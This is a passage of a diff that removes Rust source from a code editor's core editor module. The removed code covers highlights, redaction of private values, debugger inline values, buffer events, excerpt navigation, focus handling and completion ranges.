end_row = Some(end); - } else { - // Merge two hunks. - *current_end = end; - } - } else { - unreachable!(); - } - } - // We might still have a hunk that was not rendered (if there was a search hit on the last line) - push_region(start_row, end_row); - results - } - - pub fn gutter_highlights_in_range( - &self, - search_range: Range, - display_snapshot: &DisplaySnapshot, - cx: &App, - ) -> Vec<(Range, Hsla)> { - let mut results = Vec::new(); - for (color_fetcher, ranges) in self.gutter_highlights.values() { - let color = color_fetcher(cx); - let start_ix = match ranges.binary_search_by(|probe| { - let cmp = probe - .end - .cmp(&search_range.start, &display_snapshot.buffer_snapshot); - if cmp.is_gt() { - Ordering::Greater - } else { - Ordering::Less - } - }) { - Ok(i) | Err(i) => i, - }; - for range in &ranges[start_ix..] { - if range - .start - .cmp(&search_range.end, &display_snapshot.buffer_snapshot) - .is_ge() - { - break; - } - - let start = range.start.to_display_point(display_snapshot); - let end = range.end.to_display_point(display_snapshot); - results.push((start..end, color)) - } - } - results - } - - /// Get the text ranges corresponding to the redaction query - pub fn redacted_ranges( - &self, - search_range: Range, - display_snapshot: &DisplaySnapshot, - cx: &App, - ) -> Vec> { - display_snapshot - .buffer_snapshot - .redacted_ranges(search_range, |file| { - if let Some(file) = file { - file.is_private() - && EditorSettings::get( - Some(SettingsLocation { - worktree_id: file.worktree_id(cx), - path: file.path().as_ref(), - }), - cx, - ) - .redact_private_values - } else { - false - } - }) - .map(|range| { - range.start.to_display_point(display_snapshot) - ..range.end.to_display_point(display_snapshot) - }) - .collect() - } - - pub fn highlight_text( - &mut self, - ranges: Vec>, - style: HighlightStyle, - cx: &mut Context, - ) { - self.display_map.update(cx, |map, _| { - map.highlight_text(TypeId::of::(), ranges, style) - }); - cx.notify(); - } - - pub(crate) fn highlight_inlays( - &mut self, - highlights: Vec, - style: HighlightStyle, - cx: &mut Context, - ) { - self.display_map.update(cx, |map, _| { - map.highlight_inlays(TypeId::of::(), highlights, style) - }); - cx.notify(); - } - - pub fn text_highlights<'a, T: 'static>( - &'a self, - cx: &'a App, - ) -> Option<(HighlightStyle, &'a [Range])> { - self.display_map.read(cx).text_highlights(TypeId::of::()) - } - - pub fn clear_highlights(&mut self, cx: &mut Context) { - let cleared = self - .display_map - .update(cx, |map, _| map.clear_highlights(TypeId::of::())); - if cleared { - cx.notify(); - } - } - - pub fn show_local_cursors(&self, window: &mut Window, cx: &mut App) -> bool { - (self.read_only(cx) || self.blink_manager.read(cx).visible()) - && self.focus_handle.is_focused(window) - } - - pub fn set_show_cursor_when_unfocused(&mut self, is_enabled: bool, cx: &mut Context) { - self.show_cursor_when_unfocused = is_enabled; - cx.notify(); - } - - fn on_buffer_changed(&mut self, _: Entity, cx: &mut Context) { - cx.notify(); - } - - fn on_debug_session_event( - &mut self, - _session: Entity, - event: &SessionEvent, - cx: &mut Context, - ) { - match event { - SessionEvent::InvalidateInlineValue => { - self.refresh_inline_values(cx); - } - _ => {} - } - } - - fn refresh_inline_values(&mut self, cx: &mut Context) { - let Some(project) = self.project.clone() else { - return; - }; - let Some(buffer) = self.buffer.read(cx).as_singleton() else { - return; - }; - if !self.inline_value_cache.enabled { - let inlays = std::mem::take(&mut self.inline_value_cache.inlays); - self.splice_inlays(&inlays, Vec::new(), cx); - return; - } - - let current_execution_position = self - .highlighted_rows - .get(&TypeId::of::()) - .and_then(|lines| lines.last().map(|line| line.range.start)); - - self.inline_value_cache.refresh_task = cx.spawn(async move |editor, cx| { - let snapshot = editor - .update(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx)) - .ok()?; - - let inline_values = editor - .update(cx, |_, cx| { - let Some(current_execution_position) = current_execution_position else { - return Some(Task::ready(Ok(Vec::new()))); - }; - - // todo(debugger) when introducing multi buffer inline values check execution position's buffer id to make sure the text - // anchor is in the same buffer - let range = - buffer.read(cx).anchor_before(0)..current_execution_position.text_anchor; - project.inline_values(buffer, range, cx) - }) - .ok() - .flatten()? - .await - .context("refreshing debugger inlays") - .log_err()?; - - let (excerpt_id, buffer_id) = snapshot - .excerpts() - .next() - .map(|excerpt| (excerpt.0, excerpt.1.remote_id()))?; - editor - .update(cx, |editor, cx| { - let new_inlays = inline_values - .into_iter() - .map(|debugger_value| { - Inlay::debugger_hint( - post_inc(&mut editor.next_inlay_id), - Anchor::in_buffer(excerpt_id, buffer_id, debugger_value.position), - debugger_value.text(), - ) - }) - .collect::>(); - let mut inlay_ids = new_inlays.iter().map(|inlay| inlay.id).collect(); - std::mem::swap(&mut editor.inline_value_cache.inlays, &mut inlay_ids); - - editor.splice_inlays(&inlay_ids, new_inlays, cx); - }) - .ok()?; - Some(()) - }); - } - - fn on_buffer_event( - &mut self, - multibuffer: &Entity, - event: &multi_buffer::Event, - window: &mut Window, - cx: &mut Context, - ) { - match event { - multi_buffer::Event::Edited { - singleton_buffer_edited, - edited_buffer: buffer_edited, - } => { - self.scrollbar_marker_state.dirty = true; - self.active_indent_guides_state.dirty = true; - self.refresh_active_diagnostics(cx); - self.refresh_code_actions(window, cx); - self.refresh_selected_text_highlights(true, window, cx); - refresh_matching_bracket_highlights(self, window, cx); - if self.has_active_inline_completion() { - self.update_visible_inline_completion(window, cx); - } - if let Some(buffer) = buffer_edited { - let buffer_id = buffer.read(cx).remote_id(); - if !self.registered_buffers.contains_key(&buffer_id) { - if let Some(project) = self.project.as_ref() { - project.update(cx, |project, cx| { - self.registered_buffers.insert( - buffer_id, - project.register_buffer_with_language_servers(&buffer, cx), - ); - }) - } - } - } - cx.emit(EditorEvent::BufferEdited); - cx.emit(SearchEvent::MatchesInvalidated); - if *singleton_buffer_edited { - if let Some(project) = &self.project { - #[allow(clippy::mutable_key_type)] - let languages_affected = multibuffer.update(cx, |multibuffer, cx| { - multibuffer - .all_buffers() - .into_iter() - .filter_map(|buffer| { - buffer.update(cx, |buffer, cx| { - let language = buffer.language()?; - let should_discard = project.update(cx, |project, cx| { - project.is_local() - && !project.has_language_servers_for(buffer, cx) - }); - should_discard.not().then_some(language.clone()) - }) - }) - .collect::>() - }); - if !languages_affected.is_empty() { - self.refresh_inlay_hints( - InlayHintRefreshReason::BufferEdited(languages_affected), - cx, - ); - } - } - } - - let Some(project) = &self.project else { return }; - let (telemetry, is_via_ssh) = { - let project = project.read(cx); - let telemetry = project.client().telemetry().clone(); - let is_via_ssh = project.is_via_ssh(); - (telemetry, is_via_ssh) - }; - refresh_linked_ranges(self, window, cx); - telemetry.log_edit_event("editor", is_via_ssh); - } - multi_buffer::Event::ExcerptsAdded { - buffer, - predecessor, - excerpts, - } => { - self.tasks_update_task = Some(self.refresh_runnables(window, cx)); - let buffer_id = buffer.read(cx).remote_id(); - if self.buffer.read(cx).diff_for(buffer_id).is_none() { - if let Some(project) = &self.project { - get_uncommitted_diff_for_buffer( - project, - [buffer.clone()], - self.buffer.clone(), - cx, - ) - .detach(); - } - } - cx.emit(EditorEvent::ExcerptsAdded { - buffer: buffer.clone(), - predecessor: *predecessor, - excerpts: excerpts.clone(), - }); - self.refresh_inlay_hints(InlayHintRefreshReason::NewLinesShown, cx); - } - multi_buffer::Event::ExcerptsRemoved { - ids, - removed_buffer_ids, - } => { - self.refresh_inlay_hints(InlayHintRefreshReason::ExcerptsRemoved(ids.clone()), cx); - let buffer = self.buffer.read(cx); - self.registered_buffers - .retain(|buffer_id, _| buffer.buffer(*buffer_id).is_some()); - jsx_tag_auto_close::refresh_enabled_in_any_buffer(self, multibuffer, cx); - cx.emit(EditorEvent::ExcerptsRemoved { - ids: ids.clone(), - removed_buffer_ids: removed_buffer_ids.clone(), - }) - } - multi_buffer::Event::ExcerptsEdited { - excerpt_ids, - buffer_ids, - } => { - self.display_map.update(cx, |map, cx| { - map.unfold_buffers(buffer_ids.iter().copied(), cx) - }); - cx.emit(EditorEvent::ExcerptsEdited { - ids: excerpt_ids.clone(), - }) - } - multi_buffer::Event::ExcerptsExpanded { ids } => { - self.refresh_inlay_hints(InlayHintRefreshReason::NewLinesShown, cx); - cx.emit(EditorEvent::ExcerptsExpanded { ids: ids.clone() }) - } - multi_buffer::Event::Reparsed(buffer_id) => { - self.tasks_update_task = Some(self.refresh_runnables(window, cx)); - jsx_tag_auto_close::refresh_enabled_in_any_buffer(self, multibuffer, cx); - - cx.emit(EditorEvent::Reparsed(*buffer_id)); - } - multi_buffer::Event::DiffHunksToggled => { - self.tasks_update_task = Some(self.refresh_runnables(window, cx)); - } - multi_buffer::Event::LanguageChanged(buffer_id) => { - linked_editing_ranges::refresh_linked_ranges(self, window, cx); - jsx_tag_auto_close::refresh_enabled_in_any_buffer(self, multibuffer, cx); - cx.emit(EditorEvent::Reparsed(*buffer_id)); - cx.notify(); - } - multi_buffer::Event::DirtyChanged => cx.emit(EditorEvent::DirtyChanged), - multi_buffer::Event::Saved => cx.emit(EditorEvent::Saved), - multi_buffer::Event::FileHandleChanged - | multi_buffer::Event::Reloaded - | multi_buffer::Event::BufferDiffChanged => cx.emit(EditorEvent::TitleChanged), - multi_buffer::Event::Closed => cx.emit(EditorEvent::Closed), - multi_buffer::Event::DiagnosticsUpdated => { - self.refresh_active_diagnostics(cx); - self.refresh_inline_diagnostics(true, window, cx); - self.scrollbar_marker_state.dirty = true; - cx.notify(); - } - _ => {} - }; - } - - fn on_display_map_changed( - &mut self, - _: Entity, - _: &mut Window, - cx: &mut Context, - ) { - cx.notify(); - } - - fn settings_changed(&mut self, window: &mut Window, cx: &mut Context) { - self.tasks_update_task = Some(self.refresh_runnables(window, cx)); - self.update_edit_prediction_settings(cx); - self.refresh_inline_completion(true, false, window, cx); - self.refresh_inlay_hints( - InlayHintRefreshReason::SettingsChange(inlay_hint_settings( - self.selections.newest_anchor().head(), - &self.buffer.read(cx).snapshot(cx), - cx, - )), - cx, - ); - - let old_cursor_shape = self.cursor_shape; - - { - let editor_settings = EditorSettings::get_global(cx); - self.scroll_manager.vertical_scroll_margin = editor_settings.vertical_scroll_margin; - self.show_breadcrumbs = editor_settings.toolbar.breadcrumbs; - self.cursor_shape = editor_settings.cursor_shape.unwrap_or_default(); - self.hide_mouse_mode = editor_settings.hide_mouse.unwrap_or_default(); - } - - if old_cursor_shape != self.cursor_shape { - cx.emit(EditorEvent::CursorShapeChanged); - } - - let project_settings = ProjectSettings::get_global(cx); - self.serialize_dirty_buffers = project_settings.session.restore_unsaved_buffers; - - if self.mode.is_full() { - let show_inline_diagnostics = project_settings.diagnostics.inline.enabled; - let inline_blame_enabled = project_settings.git.inline_blame_enabled(); - if self.show_inline_diagnostics != show_inline_diagnostics { - self.show_inline_diagnostics = show_inline_diagnostics; - self.refresh_inline_diagnostics(false, window, cx); - } - - if self.git_blame_inline_enabled != inline_blame_enabled { - self.toggle_git_blame_inline_internal(false, window, cx); - } - } - - cx.notify(); - } - - pub fn set_searchable(&mut self, searchable: bool) { - self.searchable = searchable; - } - - pub fn searchable(&self) -> bool { - self.searchable - } - - fn open_proposed_changes_editor( - &mut self, - _: &OpenProposedChangesEditor, - window: &mut Window, - cx: &mut Context, - ) { - let Some(workspace) = self.workspace() else { - cx.propagate(); - return; - }; - - let selections = self.selections.all::(cx); - let multi_buffer = self.buffer.read(cx); - let multi_buffer_snapshot = multi_buffer.snapshot(cx); - let mut new_selections_by_buffer = HashMap::default(); - for selection in selections { - for (buffer, range, _) in - multi_buffer_snapshot.range_to_buffer_ranges(selection.start..selection.end) - { - let mut range = range.to_point(buffer); - range.start.column = 0; - range.end.column = buffer.line_len(range.end.row); - new_selections_by_buffer - .entry(multi_buffer.buffer(buffer.remote_id()).unwrap()) - .or_insert(Vec::new()) - .push(range) - } - } - - let proposed_changes_buffers = new_selections_by_buffer - .into_iter() - .map(|(buffer, ranges)| ProposedChangeLocation { buffer, ranges }) - .collect::>(); - let proposed_changes_editor = cx.new(|cx| { - ProposedChangesEditor::new( - "Proposed changes", - proposed_changes_buffers, - self.project.clone(), - window, - cx, - ) - }); - - window.defer(cx, move |window, cx| { - workspace.update(cx, |workspace, cx| { - workspace.active_pane().update(cx, |pane, cx| { - pane.add_item( - Box::new(proposed_changes_editor), - true, - true, - None, - window, - cx, - ); - }); - }); - }); - } - - pub fn open_excerpts_in_split( - &mut self, - _: &OpenExcerptsSplit, - window: &mut Window, - cx: &mut Context, - ) { - self.open_excerpts_common(None, true, window, cx) - } - - pub fn open_excerpts(&mut self, _: &OpenExcerpts, window: &mut Window, cx: &mut Context) { - self.open_excerpts_common(None, false, window, cx) - } - - fn open_excerpts_common( - &mut self, - jump_data: Option, - split: bool, - window: &mut Window, - cx: &mut Context, - ) { - let Some(workspace) = self.workspace() else { - cx.propagate(); - return; - }; - - if self.buffer.read(cx).is_singleton() { - cx.propagate(); - return; - } - - let mut new_selections_by_buffer = HashMap::default(); - match &jump_data { - Some(JumpData::MultiBufferPoint { - excerpt_id, - position, - anchor, - line_offset_from_top, - }) => { - let multi_buffer_snapshot = self.buffer.read(cx).snapshot(cx); - if let Some(buffer) = multi_buffer_snapshot - .buffer_id_for_excerpt(*excerpt_id) - .and_then(|buffer_id| self.buffer.read(cx).buffer(buffer_id)) - { - let buffer_snapshot = buffer.read(cx).snapshot(); - let jump_to_point = if buffer_snapshot.can_resolve(anchor) { - language::ToPoint::to_point(anchor, &buffer_snapshot) - } else { - buffer_snapshot.clip_point(*position, Bias::Left) - }; - let jump_to_offset = buffer_snapshot.point_to_offset(jump_to_point); - new_selections_by_buffer.insert( - buffer, - ( - vec![jump_to_offset..jump_to_offset], - Some(*line_offset_from_top), - ), - ); - } - } - Some(JumpData::MultiBufferRow { - row, - line_offset_from_top, - }) => { - let point = MultiBufferPoint::new(row.0, 0); - if let Some((buffer, buffer_point, _)) = - self.buffer.read(cx).point_to_buffer_point(point, cx) - { - let buffer_offset = buffer.read(cx).point_to_offset(buffer_point); - new_selections_by_buffer - .entry(buffer) - .or_insert((Vec::new(), Some(*line_offset_from_top))) - .0 - .push(buffer_offset..buffer_offset) - } - } - None => { - let selections = self.selections.all::(cx); - let multi_buffer = self.buffer.read(cx); - for selection in selections { - for (snapshot, range, _, anchor) in multi_buffer - .snapshot(cx) - .range_to_buffer_ranges_with_deleted_hunks(selection.range()) - { - if let Some(anchor) = anchor { - // selection is in a deleted hunk - let Some(buffer_id) = anchor.buffer_id else { - continue; - }; - let Some(buffer_handle) = multi_buffer.buffer(buffer_id) else { - continue; - }; - let offset = text::ToOffset::to_offset( - &anchor.text_anchor, - &buffer_handle.read(cx).snapshot(), - ); - let range = offset..offset; - new_selections_by_buffer - .entry(buffer_handle) - .or_insert((Vec::new(), None)) - .0 - .push(range) - } else { - let Some(buffer_handle) = multi_buffer.buffer(snapshot.remote_id()) - else { - continue; - }; - new_selections_by_buffer - .entry(buffer_handle) - .or_insert((Vec::new(), None)) - .0 - .push(range) - } - } - } - } - } - - new_selections_by_buffer - .retain(|buffer, _| Self::can_open_excerpts_in_file(buffer.read(cx).file())); - - if new_selections_by_buffer.is_empty() { - return; - } - - // We defer the pane interaction because we ourselves are a workspace item - // and activating a new item causes the pane to call a method on us reentrantly, - // which panics if we're on the stack. - window.defer(cx, move |window, cx| { - workspace.update(cx, |workspace, cx| { - let pane = if split { - workspace.adjacent_pane(window, cx) - } else { - workspace.active_pane().clone() - }; - - for (buffer, (ranges, scroll_offset)) in new_selections_by_buffer { - let editor = buffer - .read(cx) - .file() - .is_none() - .then(|| { - // Handle file-less buffers separately: those are not really the project items, so won't have a project path or entity id, - // so `workspace.open_project_item` will never find them, always opening a new editor. - // Instead, we try to activate the existing editor in the pane first. - let (editor, pane_item_index) = - pane.read(cx).items().enumerate().find_map(|(i, item)| { - let editor = item.downcast::()?; - let singleton_buffer = - editor.read(cx).buffer().read(cx).as_singleton()?; - if singleton_buffer == buffer { - Some((editor, i)) - } else { - None - } - })?; - pane.update(cx, |pane, cx| { - pane.activate_item(pane_item_index, true, true, window, cx) - }); - Some(editor) - }) - .flatten() - .unwrap_or_else(|| { - workspace.open_project_item::( - pane.clone(), - buffer, - true, - true, - window, - cx, - ) - }); - - editor.update(cx, |editor, cx| { - let autoscroll = match scroll_offset { - Some(scroll_offset) => Autoscroll::top_relative(scroll_offset as usize), - None => Autoscroll::newest(), - }; - let nav_history = editor.nav_history.take(); - editor.change_selections(Some(autoscroll), window, cx, |s| { - s.select_ranges(ranges); - }); - editor.nav_history = nav_history; - }); - } - }) - }); - } - - // For now, don't allow opening excerpts in buffers that aren't backed by - // regular project files. - fn can_open_excerpts_in_file(file: Option<&Arc>) -> bool { - file.map_or(true, |file| project::File::from_dyn(Some(file)).is_some()) - } - - fn marked_text_ranges(&self, cx: &App) -> Option>> { - let snapshot = self.buffer.read(cx).read(cx); - let (_, ranges) = self.text_highlights::(cx)?; - Some( - ranges - .iter() - .map(move |range| { - range.start.to_offset_utf16(&snapshot)..range.end.to_offset_utf16(&snapshot) - }) - .collect(), - ) - } - - fn selection_replacement_ranges( - &self, - range: Range, - cx: &mut App, - ) -> Vec> { - let selections = self.selections.all::(cx); - let newest_selection = selections - .iter() - .max_by_key(|selection| selection.id) - .unwrap(); - let start_delta = range.start.0 as isize - newest_selection.start.0 as isize; - let end_delta = range.end.0 as isize - newest_selection.end.0 as isize; - let snapshot = self.buffer.read(cx).read(cx); - selections - .into_iter() - .map(|mut selection| { - selection.start.0 = - (selection.start.0 as isize).saturating_add(start_delta) as usize; - selection.end.0 = (selection.end.0 as isize).saturating_add(end_delta) as usize; - snapshot.clip_offset_utf16(selection.start, Bias::Left) - ..snapshot.clip_offset_utf16(selection.end, Bias::Right) - }) - .collect() - } - - fn report_editor_event( - &self, - event_type: &'static str, - file_extension: Option, - cx: &App, - ) { - if cfg!(any(test, feature = "test-support")) { - return; - } - - let Some(project) = &self.project else { return }; - - // If None, we are in a file without an extension - let file = self - .buffer - .read(cx) - .as_singleton() - .and_then(|b| b.read(cx).file()); - let file_extension = file_extension.or(file - .as_ref() - .and_then(|file| Path::new(file.file_name(cx)).extension()) - .and_then(|e| e.to_str()) - .map(|a| a.to_string())); - - let vim_mode = vim_enabled(cx); - - let edit_predictions_provider = all_language_settings(file, cx).edit_predictions.provider; - let copilot_enabled = edit_predictions_provider - == language::language_settings::EditPredictionProvider::Copilot; - let copilot_enabled_for_language = self - .buffer - .read(cx) - .language_settings(cx) - .show_edit_predictions; - - let project = project.read(cx); - telemetry::event!( - event_type, - file_extension, - vim_mode, - copilot_enabled, - copilot_enabled_for_language, - edit_predictions_provider, - is_via_ssh = project.is_via_ssh(), - ); - } - - /// Copy the highlighted chunks to the clipboard as JSON. The format is an array of lines, - /// with each line being an array of {text, highlight} objects. - fn copy_highlight_json( - &mut self, - _: &CopyHighlightJson, - window: &mut Window, - cx: &mut Context, - ) { - #[derive(Serialize)] - struct Chunk<'a> { - text: String, - highlight: Option<&'a str>, - } - - let snapshot = self.buffer.read(cx).snapshot(cx); - let range = self - .selected_text_range(false, window, cx) - .and_then(|selection| { - if selection.range.is_empty() { - None - } else { - Some(selection.range) - } - }) - .unwrap_or_else(|| 0..snapshot.len()); - - let chunks = snapshot.chunks(range, true); - let mut lines = Vec::new(); - let mut line: VecDeque = VecDeque::new(); - - let Some(style) = self.style.as_ref() else { - return; - }; - - for chunk in chunks { - let highlight = chunk - .syntax_highlight_id - .and_then(|id| id.name(&style.syntax)); - let mut chunk_lines = chunk.text.split('\n').peekable(); - while let Some(text) = chunk_lines.next() { - let mut merged_with_last_token = false; - if let Some(last_token) = line.back_mut() { - if last_token.highlight == highlight { - last_token.text.push_str(text); - merged_with_last_token = true; - } - } - - if !merged_with_last_token { - line.push_back(Chunk { - text: text.into(), - highlight, - }); - } - - if chunk_lines.peek().is_some() { - if line.len() > 1 && line.front().unwrap().text.is_empty() { - line.pop_front(); - } - if line.len() > 1 && line.back().unwrap().text.is_empty() { - line.pop_back(); - } - - lines.push(mem::take(&mut line)); - } - } - } - - let Some(lines) = serde_json::to_string_pretty(&lines).log_err() else { - return; - }; - cx.write_to_clipboard(ClipboardItem::new_string(lines)); - } - - pub fn open_context_menu( - &mut self, - _: &OpenContextMenu, - window: &mut Window, - cx: &mut Context, - ) { - self.request_autoscroll(Autoscroll::newest(), cx); - let position = self.selections.newest_display(cx).start; - mouse_context_menu::deploy_context_menu(self, None, position, window, cx); - } - - pub fn inlay_hint_cache(&self) -> &InlayHintCache { - &self.inlay_hint_cache - } - - pub fn replay_insert_event( - &mut self, - text: &str, - relative_utf16_range: Option>, - window: &mut Window, - cx: &mut Context, - ) { - if !self.input_enabled { - cx.emit(EditorEvent::InputIgnored { text: text.into() }); - return; - } - if let Some(relative_utf16_range) = relative_utf16_range { - let selections = self.selections.all::(cx); - self.change_selections(None, window, cx, |s| { - let new_ranges = selections.into_iter().map(|range| { - let start = OffsetUtf16( - range - .head() - .0 - .saturating_add_signed(relative_utf16_range.start), - ); - let end = OffsetUtf16( - range - .head() - .0 - .saturating_add_signed(relative_utf16_range.end), - ); - start..end - }); - s.select_ranges(new_ranges); - }); - } - - self.handle_input(text, window, cx); - } - - pub fn supports_inlay_hints(&self, cx: &mut App) -> bool { - let Some(provider) = self.semantics_provider.as_ref() else { - return false; - }; - - let mut supports = false; - self.buffer().update(cx, |this, cx| { - this.for_each_buffer(|buffer| { - supports |= provider.supports_inlay_hints(buffer, cx); - }); - }); - - supports - } - - pub fn is_focused(&self, window: &Window) -> bool { - self.focus_handle.is_focused(window) - } - - fn handle_focus(&mut self, window: &mut Window, cx: &mut Context) { - cx.emit(EditorEvent::Focused); - - if let Some(descendant) = self - .last_focused_descendant - .take() - .and_then(|descendant| descendant.upgrade()) - { - window.focus(&descendant); - } else { - if let Some(blame) = self.blame.as_ref() { - blame.update(cx, GitBlame::focus) - } - - self.blink_manager.update(cx, |blink_manager, cx| { - blink_manager.enable(cx); - }); - self.show_cursor_names(window, cx); - self.buffer.update(cx, |buffer, cx| { - buffer.finalize_last_transaction(cx); - if self.leader_peer_id.is_none() { - buffer.set_active_selections( - &self.selections.disjoint_anchors(), - self.selections.line_mode, - self.cursor_shape, - cx, - ); - } - }); - } - } - - fn handle_focus_in(&mut self, _: &mut Window, cx: &mut Context) { - cx.emit(EditorEvent::FocusedIn) - } - - fn handle_focus_out( - &mut self, - event: FocusOutEvent, - _window: &mut Window, - cx: &mut Context, - ) { - if event.blurred != self.focus_handle { - self.last_focused_descendant = Some(event.blurred); - } - self.refresh_inlay_hints(InlayHintRefreshReason::ModifiersChanged(false), cx); - } - - pub fn handle_blur(&mut self, window: &mut Window, cx: &mut Context) { - self.blink_manager.update(cx, BlinkManager::disable); - self.buffer - .update(cx, |buffer, cx| buffer.remove_active_selections(cx)); - - if let Some(blame) = self.blame.as_ref() { - blame.update(cx, GitBlame::blur) - } - if !self.hover_state.focused(window, cx) { - hide_hover(self, cx); - } - if !self - .context_menu - .borrow() - .as_ref() - .is_some_and(|context_menu| context_menu.focused(window, cx)) - { - self.hide_context_menu(window, cx); - } - self.discard_inline_completion(false, cx); - cx.emit(EditorEvent::Blurred); - cx.notify(); - } - - pub fn register_action( - &mut self, - listener: impl Fn(&A, &mut Window, &mut App) + 'static, - ) -> Subscription { - let id = self.next_editor_action_id.post_inc(); - let listener = Arc::new(listener); - self.editor_actions.borrow_mut().insert( - id, - Box::new(move |window, _| { - let listener = listener.clone(); - window.on_action(TypeId::of::(), move |action, phase, window, cx| { - let action = action.downcast_ref().unwrap(); - if phase == DispatchPhase::Bubble { - listener(action, window, cx) - } - }) - }), - ); - - let editor_actions = self.editor_actions.clone(); - Subscription::new(move || { - editor_actions.borrow_mut().remove(&id); - }) - } - - pub fn file_header_size(&self) -> u32 { - FILE_HEADER_HEIGHT - } - - pub fn restore( - &mut self, - revert_changes: HashMap, Rope)>>, - window: &mut Window, - cx: &mut Context, - ) { - let workspace = self.workspace(); - let project = self.project.as_ref(); - let save_tasks = self.buffer().update(cx, |multi_buffer, cx| { - let mut tasks = Vec::new(); - for (buffer_id, changes) in revert_changes { - if let Some(buffer) = multi_buffer.buffer(buffer_id) { - buffer.update(cx, |buffer, cx| { - buffer.edit( - changes - .into_iter() - .map(|(range, text)| (range, text.to_string())), - None, - cx, - ); - }); - - if let Some(project) = - project.filter(|_| multi_buffer.all_diff_hunks_expanded()) - { - project.update(cx, |project, cx| { - tasks.push((buffer.clone(), project.save_buffer(buffer, cx))); - }) - } - } - } - tasks - }); - cx.spawn_in(window, async move |_, cx| { - for (buffer, task) in save_tasks { - let result = task.await; - if result.is_err() { - let Some(path) = buffer - .read_with(cx, |buffer, cx| buffer.project_path(cx)) - .ok() - else { - continue; - }; - if let Some((workspace, path)) = workspace.as_ref().zip(path) { - let Some(task) = cx - .update_window_entity(&workspace, |workspace, window, cx| { - workspace - .open_path_preview(path, None, false, false, false, window, cx) - }) - .ok() - else { - continue; - }; - task.await.log_err(); - } - } - } - }) - .detach(); - self.change_selections(None, window, cx, |selections| selections.refresh()); - } - - pub fn to_pixel_point( - &self, - source: multi_buffer::Anchor, - editor_snapshot: &EditorSnapshot, - window: &mut Window, - ) -> Option> { - let source_point = source.to_display_point(editor_snapshot); - self.display_to_pixel_point(source_point, editor_snapshot, window) - } - - pub fn display_to_pixel_point( - &self, - source: DisplayPoint, - editor_snapshot: &EditorSnapshot, - window: &mut Window, - ) -> Option> { - let line_height = self.style()?.text.line_height_in_pixels(window.rem_size()); - let text_layout_details = self.text_layout_details(window); - let scroll_top = text_layout_details - .scroll_anchor - .scroll_position(editor_snapshot) - .y; - - if source.row().as_f32() < scroll_top.floor() { - return None; - } - let source_x = editor_snapshot.x_for_display_point(source, &text_layout_details); - let source_y = line_height * (source.row().as_f32() - scroll_top); - Some(gpui::Point::new(source_x, source_y)) - } - - pub fn has_visible_completions_menu(&self) -> bool { - !self.edit_prediction_preview_is_active() - && self.context_menu.borrow().as_ref().map_or(false, |menu| { - menu.visible() && matches!(menu, CodeContextMenu::Completions(_)) - }) - } - - pub fn register_addon(&mut self, instance: T) { - self.addons - .insert(std::any::TypeId::of::(), Box::new(instance)); - } - - pub fn unregister_addon(&mut self) { - self.addons.remove(&std::any::TypeId::of::()); - } - - pub fn addon(&self) -> Option<&T> { - let type_id = std::any::TypeId::of::(); - self.addons - .get(&type_id) - .and_then(|item| item.to_any().downcast_ref::()) - } - - pub fn addon_mut(&mut self) -> Option<&mut T> { - let type_id = std::any::TypeId::of::(); - self.addons - .get_mut(&type_id) - .and_then(|item| item.to_any_mut()?.downcast_mut::()) - } - - fn character_size(&self, window: &mut Window) -> gpui::Size { - let text_layout_details = self.text_layout_details(window); - let style = &text_layout_details.editor_style; - let font_id = window.text_system().resolve_font(&style.text.font()); - let font_size = style.text.font_size.to_pixels(window.rem_size()); - let line_height = style.text.line_height_in_pixels(window.rem_size()); - let em_width = window.text_system().em_width(font_id, font_size).unwrap(); - - gpui::Size::new(em_width, line_height) - } - - pub fn wait_for_diff_to_load(&self) -> Option>> { - self.load_diff_task.clone() - } - - fn read_metadata_from_db( - &mut self, - item_id: u64, - workspace_id: WorkspaceId, - window: &mut Window, - cx: &mut Context, - ) { - if self.is_singleton(cx) - && WorkspaceSettings::get(None, cx).restore_on_startup != RestoreOnStartupBehavior::None - { - let buffer_snapshot = OnceCell::new(); - - if let Some(folds) = DB.get_editor_folds(item_id, workspace_id).log_err() { - if !folds.is_empty() { - let snapshot = - buffer_snapshot.get_or_init(|| self.buffer.read(cx).snapshot(cx)); - self.fold_ranges( - folds - .into_iter() - .map(|(start, end)| { - snapshot.clip_offset(start, Bias::Left) - ..snapshot.clip_offset(end, Bias::Right) - }) - .collect(), - false, - window, - cx, - ); - } - } - - if let Some(selections) = DB.get_editor_selections(item_id, workspace_id).log_err() { - if !selections.is_empty() { - let snapshot = - buffer_snapshot.get_or_init(|| self.buffer.read(cx).snapshot(cx)); - self.change_selections(None, window, cx, |s| { - s.select_ranges(selections.into_iter().map(|(start, end)| { - snapshot.clip_offset(start, Bias::Left) - ..snapshot.clip_offset(end, Bias::Right) - })); - }); - } - }; - } - - self.read_scroll_position_from_db(item_id, workspace_id, window, cx); - } -} - -fn vim_enabled(cx: &App) -> bool { - cx.global::() - .raw_user_settings() - .get("vim_mode") - == Some(&serde_json::Value::Bool(true)) -} - -// Consider user intent and default settings -fn choose_completion_range( - completion: &Completion, - intent: CompletionIntent, - buffer: &Entity, - cx: &mut Context, -) -> Range { - fn should_replace( - completion: &Completion, - insert_range: &Range, - intent: CompletionIntent, - completion_mode_setting: LspInsertMode, - buffer: &Buffer, - ) -> bool { - // specific actions take precedence over settings - match intent { - CompletionIntent::CompleteWithInsert => return false, - CompletionIntent::CompleteWithReplace => return true, - CompletionIntent::Complete | CompletionIntent::Compose => {} - } - - match completion_mode_setting { - LspInsertMode::Insert => false, - LspInsertMode::Replace => true, - LspInsertMode::ReplaceSubsequence => { - let mut text_to_replace = buffer.chars_for_range( - buffer.anchor_before(completion.replace_range.start) - ..buffer.anchor_after(completion.replace_range.end), - ); - let mut completion_text = completion.new_text.chars(); - - // is `text_to_replace` a subsequence of `completion_text` - text_to_replace - .all(|needle_ch| completion_text.any(|haystack_ch| haystack_ch == needle_ch)) - } - LspInsertMode::ReplaceSuffix => { - let range_after_cursor = insert_range.end..completion.replace_range.end; - - let text_after_cursor = buffer - .text_for_range( - buffer.anchor_before(range_after_cursor.start) - ..buffer.anchor_after(range_after_cursor.end), - ) - .collect::(); - completion.new_text.ends_with(&text_after_cursor) - } - } - } - - let buffer = buffer.read(cx); - - if let CompletionSource::Lsp { - insert_range: Some(insert_range), - .. - } = &completion.source - { - let completion_mode_setting = - language_settings(cx).buffer(buffer).get() - .completions - .lsp_insert_mode; - - if !should_replace( - completion, - &insert_range, - intent, - completion_mode_setting, - buffer, - ) { - return insert_range.to_offset(buffer); - } - } - - completion.replace_range.to_offset(buffer) -} - -fn insert_extra_newline_brackets( - buffer: 